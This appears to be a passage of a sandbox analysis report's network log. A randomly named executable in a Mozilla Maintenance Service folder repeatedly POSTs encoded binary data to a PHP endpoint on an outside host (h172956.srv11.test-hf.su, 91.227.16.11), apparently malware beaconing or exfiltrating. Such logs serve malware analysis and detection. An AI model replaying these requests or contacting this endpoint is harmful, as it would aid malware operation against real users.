                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:45.705544949 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:45.705831051 CET | 2596 | OUT | Data: binary request body
                                                                    Mar 5, 2024 22:28:45.945550919 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:45 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    83 | 192.168.2.5 | 49806 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:28:46.283693075 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:46.493628025 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:46.493868113 CET | 2596 | OUT | Data: binary request body
                                                                    Mar 5, 2024 22:28:46.730211973 CET | 259 | IN | HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:46 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                    84  192.168.2.5  49807  91.227.16.11  80  4980  C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                    Mar 5, 2024 22:28:47.067908049 CET  348  OUT  POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:47.277792931 CET  25  IN  HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:47.278280020 CET2596OUTData Raw: 54 5d 54 5b 5e 5a 50 53 5e 57 5a 51 57 5f 50 53 54 51 54 5b 56 5a 57 5e 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: T]T[^ZPS^WZQW_PSTQT[VZW^T^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9D.!9%0*'6*X8._$'Y1;6(P5$'+^2?!;9%Z"!Q*1
                                                                    Mar 5, 2024 22:28:47.515959024 CET  259  IN  HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:47 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                    85  192.168.2.5  49809  91.227.16.11  80  4980  C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                    Mar 5, 2024 22:28:47.916030884 CET  348  OUT  POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 1920
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:48.129215956 CET  25  IN  HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:48.129556894 CET1920OUTData Raw: 51 5b 54 5c 5b 5f 55 5d 5e 57 5a 51 57 5f 50 5d 54 50 54 5e 56 5c 57 5e 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: Q[T\[_U]^WZQW_P]TPT^V\W^T^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]:.26S33_39,?"X0^#[1V#< U5'\0Y$,%;9%Z"!Q*1
                                                                    Mar 5, 2024 22:28:48.366027117 CET  259  IN  HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:48 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                    86  192.168.2.5  49810  91.227.16.11  80  4980  C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                    Mar 5, 2024 22:28:48.034240007 CET  348  OUT  POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:48.244180918 CET  25  IN  HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:48.244460106 CET2596OUTData Raw: 51 59 54 5c 5b 5d 55 57 5e 57 5a 51 57 5c 50 5f 54 54 54 59 56 5d 57 5f 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: QYT\[]UW^WZQW\P_TTTYV]W_T^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9D/W1$2$6\8?$+;2)T#<"<?\$2-9%Z"!Q*=
                                                                    Mar 5, 2024 22:28:48.479636908 CET  259  IN  HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:48 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                    87  192.168.2.5  49811  91.227.16.11  80  4980  C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                    Mar 5, 2024 22:28:48.815577030 CET  324  OUT  POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Mar 5, 2024 22:28:49.027170897 CET  25  IN  HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:49.027487993 CET2596OUTData Raw: 54 51 51 5d 5e 5b 55 53 5e 57 5a 51 57 5a 50 5c 54 54 54 52 56 5b 57 5e 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: TQQ]^[US^WZQWZP\TTTRV[W^T^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]:;":V%0>356;$8+%:<T!?+"<0$$,$/!/%Z"!Q*%
                                                                    Mar 5, 2024 22:28:49.264858961 CET  259  IN  HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:49 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                    88  192.168.2.5  49812  91.227.16.11  80  4980  C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                    Mar 5, 2024 22:28:49.803162098 CET  348  OUT  POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:50.013828039 CET  25  IN  HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:50.014149904 CET2596OUTData Raw: 51 5a 54 5f 5b 5c 55 51 5e 57 5a 51 57 5d 50 58 54 55 54 5d 56 5a 57 5e 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: QZT_[\UQ^WZQW]PXTUT]VZW^T^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9D,1-%#=Z'6X,$/]':;68P5/X$7?X18%Z"!Q*9
                                                                    Mar 5, 2024 22:28:50.252248049 CET  259  IN  HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:50 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                    89  192.168.2.5  49813  91.227.16.11  80  4980  C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                    Mar 5, 2024 22:28:51.939429998 CET  348  OUT  POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:52.146306992 CET  25  IN  HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:52.146541119 CET2596OUTData Raw: 51 5c 54 5c 5b 5b 55 52 5e 57 5a 51 57 51 50 5e 54 56 54 5c 56 54 57 5a 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: Q\T\[[UR^WZQWQP^TVT\VTWZT^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9/!!%#9]$6:8,2';;Z&;!,(!0'1/-,%Z"!Q*
                                                                    Mar 5, 2024 22:28:52.382245064 CET  259  IN  HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:52 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                    90  192.168.2.5  49814  91.227.16.11  80  4980  C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                    Mar 5, 2024 22:28:52.718271017 CET  348  OUT  POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:52.925309896 CET  25  IN  HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:52.925548077 CET2596OUTData Raw: 54 5a 54 5d 5e 5e 55 51 5e 57 5a 51 57 50 50 5d 54 52 54 53 56 58 57 54 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: TZT]^^UQ^WZQWPP]TRTSVXWTT^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9/!.306$%-,-$801_<6'!<+_'B+_$<1;%Z"!Q*
                                                                    Mar 5, 2024 22:28:53.156841993 CET  259  IN  HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:53 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                    91  192.168.2.5  49816  91.227.16.11  80  4980  C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                    Mar 5, 2024 22:28:53.581808090 CET  348  OUT  POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 1920
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:53.788778067 CET  25  IN  HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:53.788966894 CET1920OUTData Raw: 54 5f 51 5c 5b 57 55 52 5e 57 5a 51 57 5e 50 5d 54 5c 54 59 56 5b 57 5a 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: T_Q\[WUR^WZQW^P]T\TYV[WZT^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]:8'31$&;Y"]3(<2: U",V!,'7+_1/=,9%Z"!Q*
                                                                    Mar 5, 2024 22:28:54.022955894 CET  259  IN  HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:53 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                    92  192.168.2.5  49817  91.227.16.11  80  4980  C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                    Mar 5, 2024 22:28:53.705435991 CET  348  OUT  POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:53.915766001 CET  25  IN  HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:53.915968895 CET2596OUTData Raw: 54 5a 54 5a 5b 57 55 55 5e 57 5a 51 57 51 50 5d 54 5c 54 5c 56 5b 57 5a 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: TZTZ[WUU^WZQWQP]T\T\V[WZT^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9,$#%[35"Y/?>$(/Y& 675?Y0B'2<";%Z"!Q*
                                                                    Mar 5, 2024 22:28:54.153639078 CET  259  IN  HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:54 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                    93  192.168.2.5  49818  91.227.16.11  80  4980  C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                    Mar 5, 2024 22:28:54.502968073 CET  324  OUT  POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Mar 5, 2024 22:28:54.713726997 CET  25  IN  HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:54.713985920 CET2596OUTData Raw: 54 5b 54 5d 5b 59 50 54 5e 57 5a 51 57 5c 50 58 54 5d 54 5c 56 5c 57 55 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: T[T][YPT^WZQW\PXT]T\V\WUT^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]:,W233%:\8?08296/#!/?'7($<"Z,%Z"!Q*=
                                                                    Mar 5, 2024 22:28:54.951894045 CET  259  IN  HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:54 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                    94  192.168.2.5  49819  91.227.16.11  80  4980  C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                    Mar 5, 2024 22:28:55.290255070 CET  348  OUT  POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:55.500909090 CET  25  IN  HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:55.501285076 CET2596OUTData Raw: 51 5b 54 5f 5b 56 50 50 5e 57 5a 51 57 50 50 58 54 50 54 5c 56 5e 57 58 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: Q[T_[VPP^WZQWPPXTPT\V^WXT^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]:8939[0&X/%'319!,4!/7Y$ &1-)%Z"!Q*
                                                                    Mar 5, 2024 22:28:55.739537001 CET  259  IN  HTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:55 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    95 | 192.168.2.5 | 49820 | 91.227.16.11 | 80 | 4980 | C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Mar 5, 2024 22:28:56.067059040 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:56.275928020 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:56.276189089 CET2596OUTData Raw: 54 5e 51 5c 5b 5d 50 53 5e 57 5a 51 57 5f 50 53 54 56 54 5a 56 5a 57 54 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: T^Q\[]PS^WZQW_PSTVTZVZWTT^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9,%'3['&],/.^&+3X%9Q6<6(37]&Z!8)%Z"!Q*1
